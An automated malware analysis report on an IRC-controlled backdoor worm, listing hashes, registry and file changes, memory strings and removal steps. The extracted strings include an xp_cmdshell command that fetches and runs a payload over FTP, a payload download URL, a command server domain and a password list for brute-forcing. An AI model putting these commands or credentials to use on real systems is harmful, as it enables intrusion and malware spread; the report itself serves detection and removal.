Win32.Virtob.Gen.12_03f087c558
Backdoor.Win32.IRCBot.jwy (Kaspersky), Win32.Virtob.Gen.12 (B) (Emsisoft), Win32.Virtob.Gen.12 (AdAware), Backdoor.Win32.PcClient.FD, GenericAutorunWorm.YR, GenericInjector.YR, GenericIRCBot.YR (Lavasoft MAS)
Behaviour: Backdoor, Worm, WormAutorun, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 03f087c5586068f01ac35e2d92f3700a
SHA1: a44cd1a0935aa2a4ff6a0d7c03fac675bd557b40
SHA256: 4aeffd206abfbd143ea972069d05dfebbe1de119ceb101c8e993bbc45d1061ab
SSDeep: 768:RuCkdC2D5z4oWV0OCAB4Rld8Inv48rXyKDQm6Aix3bNLUAllM:Rjkdjl8WK4RP84vnrXyKGx3FBs
Size: 52736 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 1987-01-30 06:38:08
Analyzed on: WindowsXPESX SP3 32-bit
Summary:
Backdoor. Malware that enables a remote control of victim's machine.
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Backdoor's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:356
rundll32.exe:1004
dumprep.exe:1352
dumprep.exe:1504
The Backdoor injects its code into the following process(es):
csrsc.exe:212
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:356 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\csrsc.exe (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process csrsc.exe:212 makes changes in the file system.
The Backdoor deletes the following file(s):
C:\%original file name%.exe (0 bytes)
Registry activity
The process %original file name%.exe:356 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 76 32 1B 1B D1 47 C5 F2 A8 94 21 0F 8A A1 64"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions]
"onstared" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process rundll32.exe:1004 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 D8 94 86 FD 99 FE B2 71 42 91 BF 40 C1 18 58"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\%WinDir%]
"explorer.exe" = "EnableNXShowUI"
[HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatibility]
"AppCompatCache" = "EF BE AD DE 60 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"explorer.exe" = "Windows Explorer"
The process csrsc.exe:212 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 07 5A CD 20 F2 14 7C 38 BD 6B 78 C1 1E 0A 8B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Control]
"WaitToKillServiceTimeout" = "7000"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions]
"onstared"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process dumprep.exe:1352 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 B3 49 D7 C4 AB 30 87 90 C9 CC E7 2B EE 28 DF"
The process dumprep.exe:1504 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 5D 68 80 13 B8 82 76 19 50 EA 39 0C 59 C2 6B"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Backdoor's file once a user opens a drive's folder in Windows Explorer.
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 495616 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 499712 | 36864 | 30720 | 5.3904 | c304340bc3163329c23454b344de2155 |
| UPX2 | 536576 | 20992 | 20992 | 4.3414 | 0e115b10c48b01660765ecab17099096 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Backdoor connects to the servers at the folowing location(s):
t1SSSSh
log.in
l.out
staticftp
sftp
rm.die
rm.now
ip.wget
ip.download
r0flz.updt
r4wr.nb
%s:*:%s
WinExec
kernel32.dll
%s [ ].
%s "%s")
%s %s!%s@%s (Tried: %s)
%s %s out.
%s S <%i> out.
%s No L: <%i>
%s I: <%i>
%s S: <%d> t(s).
%s N.
%s K t: <%s>
%s F to k t: <%s>
%s %s a run: <%d>.
%s F to s %s, e: <%d>.
err! %s.
%s n.
: %s!%s@%s
%s started.
%s bad form.
FAILED cmd.
%s DL URL: %s to: %s.
[cftp]
Failed to start scan thread, error: <%d>.
%s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%d.x.x.x
Failed to start scan, port is invalid.
Already scanning with %d threads. Too many specified.
%s dling from: %s to: %s.
%seme_%d%d%d%d%d.exe
[chttp]
%s Error: %s.
%s Created: "%s", PID: <%d>
%s Failed: "%s", error: <%d>
%s error: <%d>
%s dl: %.1fKB to: %s @ %.1fKB/sec.
%s Cg: %s.
csrsc.exe
Windows Spool Services
gg.arrancar.org
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions
%s\%s
wormride.tftp
Ping Timeout? (%d-%d)%d/%d
%s Login List complete.
<%i> %s!%s@%s
%s Login List:
USER %s * 0 :%s
NICK %s
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
KICK %s %s
KICK %s %s :%s
MODE %s %s %s
MODE %s %s
%d.%d.%d.%d
shlwapi.dll
psapi.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegQueryInfoKeyA
RegEnumKeyExA
RegCloseKey
RegDeleteKeyA
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
EnumWindows
ExitWindowsEx
user32.dll
%s!%s@%s
%c%c%c%c%c%c%c
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
(%.2d) %s\%s (%s)
(%.2d) %s\%s
%s No %s t found.
%s %s t stp. (%d t(s) stp.)
%s End.
%d. %s
%s List:
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Explorer.exe
winpass
sqlpassoainstall
databasepassword
databasepass
dbpassword
dbpass
domainpassword
domainpass
loginpass
login
windows
1234567890
123456789
12345678
1234567
pass1234
passwd
password
password1
exploiting (%s):%d, %s/%s
EXEC master..xp_cmdshell 'del z&echo open %s %s >> z&echo user %s %s >> z &echo get %s >> z &echo quit >> z &ftp -n -s:z &%s&del z
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%sWindows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
onQhurlmT
hXXp://%s:%i/x
x.exe
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
mssql.c
%s.%s.%s.%s
httpd
Finished at %s:%d after %d minute(s) of scanning.
-%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to initialize critical section, error: <%d>
Portscan: %s:%d open.
%s -AutoScan- started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
autorunme.exe
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
wormride.tftpd
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
192.168.1.130
c:\%original file name%.exe
Sequential -AutoScan- started on 192.168.0.0:445 with a delay of 4 seconds for 0 minutes using 80 threads.
hXXp://192.168.1.130:5884/x
-192.168.0.0:445, Scan thread: 2, Sub-thread: 1.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 2.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 3.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 4.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 5.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 6.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 7.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 8.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 9.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 10.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 11.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 12.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 13.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 14.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 15.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 16.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 17.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 18.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 19.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 20.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 21.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 22.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 23.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 24.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 25.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 26.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 27.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 28.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 29.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 30.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 31.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 32.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 33.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 34.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 35.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 36.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 37.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 38.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 39.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 40.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 41.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 42.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 43.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 44.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 45.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 46.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 47.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 48.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 49.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 50.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 51.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 52.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 53.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 54.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 55.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 56.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 57.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 58.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 59.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 60.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 61.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 62.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 63.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 64.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 65.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 66.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 67.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 68.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 69.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 70.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 71.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 72.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 73.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 74.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 75.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 76.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 77.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 78.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 79.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 80.
192.168.0.0
GetWindowsDirectoryA
_acmdln
ShellExecuteExA
.text
`.rdata
@.data
.idata
.reloc
6Key|&
]23456789[
.yfaCt)G
0-5081-101B-9
2434476
91937-603
HTTP/m
%fwek&U
.LehB
msvcrt.dll
wsock32.dll
eac35e2d92f3700a.exe
csrsc.exe_212_rwx_00401000_00083000:
t1SSSSh
log.in
l.out
staticftp
sftp
rm.die
rm.now
ip.wget
ip.download
r0flz.updt
r4wr.nb
%s:*:%s
WinExec
kernel32.dll
%s [ ].
%s "%s")
%s %s!%s@%s (Tried: %s)
%s %s out.
%s S <%i> out.
%s No L: <%i>
%s I: <%i>
%s S: <%d> t(s).
%s N.
%s K t: <%s>
%s F to k t: <%s>
%s %s a run: <%d>.
%s F to s %s, e: <%d>.
err! %s.
%s n.
: %s!%s@%s
%s started.
%s bad form.
FAILED cmd.
%s DL URL: %s to: %s.
[cftp]
Failed to start scan thread, error: <%d>.
%s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%d.x.x.x
Failed to start scan, port is invalid.
Already scanning with %d threads. Too many specified.
%s dling from: %s to: %s.
%seme_%d%d%d%d%d.exe
[chttp]
%s Error: %s.
%s Created: "%s", PID: <%d>
%s Failed: "%s", error: <%d>
%s error: <%d>
%s dl: %.1fKB to: %s @ %.1fKB/sec.
%s Cg: %s.
csrsc.exe
Windows Spool Services
gg.arrancar.org
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions
%s\%s
wormride.tftp
Ping Timeout? (%d-%d)%d/%d
%s Login List complete.
<%i> %s!%s@%s
%s Login List:
USER %s * 0 :%s
NICK %s
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
KICK %s %s
KICK %s %s :%s
MODE %s %s %s
MODE %s %s
%d.%d.%d.%d
shlwapi.dll
psapi.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegQueryInfoKeyA
RegEnumKeyExA
RegCloseKey
RegDeleteKeyA
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
EnumWindows
ExitWindowsEx
user32.dll
%s!%s@%s
%c%c%c%c%c%c%c
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
(%.2d) %s\%s (%s)
(%.2d) %s\%s
%s No %s t found.
%s %s t stp. (%d t(s) stp.)
%s End.
%d. %s
%s List:
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Explorer.exe
winpass
sqlpassoainstall
databasepassword
databasepass
dbpassword
dbpass
domainpassword
domainpass
loginpass
login
windows
1234567890
123456789
12345678
1234567
pass1234
passwd
password
password1
exploiting (%s):%d, %s/%s
EXEC master..xp_cmdshell 'del z&echo open %s %s >> z&echo user %s %s >> z &echo get %s >> z &echo quit >> z &ftp -n -s:z &%s&del z
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%sWindows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
onQhurlmT
hXXp://%s:%i/x
x.exe
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
mssql.c
%s.%s.%s.%s
httpd
Finished at %s:%d after %d minute(s) of scanning.
-%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to initialize critical section, error: <%d>
Portscan: %s:%d open.
%s -AutoScan- started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
autorunme.exe
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
wormride.tftpd
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
192.168.1.130
c:\%original file name%.exe
Sequential -AutoScan- started on 192.168.0.0:445 with a delay of 4 seconds for 0 minutes using 80 threads.
hXXp://192.168.1.130:5884/x
-192.168.0.0:445, Scan thread: 2, Sub-thread: 1.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 2.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 3.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 4.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 5.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 6.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 7.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 8.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 9.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 10.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 11.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 12.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 13.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 14.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 15.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 16.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 17.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 18.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 19.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 20.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 21.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 22.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 23.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 24.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 25.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 26.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 27.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 28.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 29.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 30.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 31.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 32.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 33.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 34.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 35.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 36.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 37.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 38.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 39.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 40.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 41.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 42.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 43.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 44.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 45.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 46.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 47.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 48.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 49.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 50.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 51.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 52.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 53.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 54.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 55.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 56.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 57.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 58.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 59.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 60.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 61.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 62.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 63.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 64.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 65.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 66.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 67.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 68.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 69.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 70.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 71.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 72.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 73.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 74.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 75.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 76.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 77.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 78.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 79.
-192.168.0.0:445, Scan thread: 2, Sub-thread: 80.
192.168.0.0
GetWindowsDirectoryA
_acmdln
ShellExecuteExA
.text
`.rdata
@.data
.idata
.reloc
6Key|&
]23456789[
.yfaCt)G
0-5081-101B-9
2434476
91937-603
HTTP/m
%fwek&U
.LehB
msvcrt.dll
wsock32.dll
eac35e2d92f3700a.exe
rundll32.exe_1004:
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:356
rundll32.exe:1004
dumprep.exe:1352
dumprep.exe:1504 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\csrsc.exe (52 bytes)
